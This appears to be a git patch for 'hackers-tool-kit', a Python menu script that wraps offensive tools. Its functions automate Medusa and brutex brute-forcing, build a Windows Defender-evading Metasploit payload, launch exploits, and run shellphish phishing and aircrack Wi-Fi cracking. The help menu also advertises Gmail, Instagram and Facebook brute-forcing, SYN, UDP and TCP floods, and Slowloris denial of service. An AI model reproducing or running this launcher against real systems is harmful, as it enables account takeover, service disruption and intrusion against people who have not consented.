md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 4d62163fb049097dc96a2fd6265063f49379f347 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 21:56:10 +0100 Subject: [PATCH 115/214] Delete htk.py --- htk.py | 2711 -------------------------------------------------------- 1 file changed, 2711 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index 3bfd922..0000000 --- a/htk.py +++ /dev/null @@ -1,2711 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ - ███ ███ ███ - █▀ █▀ █▀ - - ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ - ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m - ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ - ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m - │ │ ││ ││───├┴┐│ │ - ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m -Created By @tuf_unkn0wn - """.decode('utf-8') -def mainbanner3(): - print """\033[91m - ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ - ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ - ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ - ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ - ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ - ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ - ░░ ░▒ ░ ░░ ░▒ ░ - ░ ░ ░ ░ - ░ ░ ░ ░ - \033[90m - - ████████████████████ - ██ ██\033[91m - ▒▒ ▒▒ - ░░ ░░ - ░ ░ - ░ ░\033[0m - -888 888 88888888888 888 d8P -888 888 888 888 d8P -888 888 888 888 d8P \033[1;36m -8888888888 888 888d88K -888 888 888 8888888b\033[0m -888 888 888888 888 888888 888 Y88b -888 888 888 888 Y88b -888 888 888 888 Y88b - Created By @tuf_unkn0wn On Instagram - """.decode('utf-8') -def mainbanner4(): - print P+""" - .S S. sdSS_SSSSSSbs .S S. - .SS SS. YSSS~S%SSSSSP .SS SS. - S%S S%S S%S S%S S&S - S%S S%S S%S S%S d*S - S%S SSSS%S S&S S&S .S*S - S&S SSS&S S&S S&S_sdSSS - S&S S&S S&S S&S~YSSY%b - S&S S&S S&S S&S `S% - S*S S*S S*S S*S S% - S*S S*S S*S S*S n& - S*S S*S S*S S*S wS& - SSS S*S S*S S*S 0 SS - h SP SP SP n - a Y Y Y k - c n - k e r s - t o o l - k i t by @tuf_u\033[0m - """.decode('utf-8') -def mainbanner5(): - print R+""" - ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ - ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ - ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ - ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ - ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ - ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ - ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ - ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ - ░\033[0m - .,,,,,,,,,,.,,,.....,........................... - ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, - ..,......,.....,,.,........,,...........,,.,.... - ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ - ***********************//***/***//**/********** - ****************** ****************** @tuf_unkn0wn - *,*****,*,******** ***,************** - **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** - ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, - ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, - ***********************************************\033[91m - - ▄████▄ █ ██ ▄▄▄█████▓ ██████ - ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ - ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ - ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ - ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ - ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ - ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ - ░ ░░░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ - ░ \033[0m - """.decode('utf-8') -def mainbanner6(): - print """ - |-|____________________ - /|_|_\ /__,''___ /____ /| - |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| - |``````|_________|`````| | - | \033[93m~~~~~~~~~~~~~~\033[0m | | - | .-/\-, | | - | _\\//_ | | - | \033[92m| /(_)|\033[0m | | - |\033[92m_______|_||.-.|_______\033[0m|/| - |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| - |\033[92m```````|_||:_)|```````\033[0m| | - | \033[92m|______| \033[0m| | - | ______ | | - | (__\033[90m24\033[0m__) | | - | ~~~~~~~~ | | - | By @tuf_unkn0wn | | - |______________________|/ - \033[91m - ) ( ) ( - ( /( )\ ) ( /( )\ ( ( ( - )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( - ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ - | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) - | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< - |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ - |___/ - \033[90m - ) - (\033[33m - _ \033[0m___________ \033[90m)\033[33m - [_[\033[0m___________\033[91m#\033[0m - """.decode('utf-8') -def mainbanner7(): - os.system("cat /root/hackers-tool-kit/tools/skull.txt") -def mainbanner(): - import random - for x in range(10): - num = random.randint(1,7) - if num == 1: - mainbanner1() - if num == 2: - mainbanner2() - if num == 3: - mainbanner3() - if num == 4: - mainbanner4() - if num == 5: - mainbanner5() - if num == 6: - mainbanner6() - if num == 7: - mainbanner7() -#--------------------------# -#MAIN STARTING BANNER END# - - -#HELP BANNER START# -#-----------------# -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -about : about the creator / me -? : displays this message -clear : clears screen except for banner -clearall: clears everything on screen -banner : clears screen and shows new banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -connect : connect to a host -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -aircrack: aircrack-ng automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn 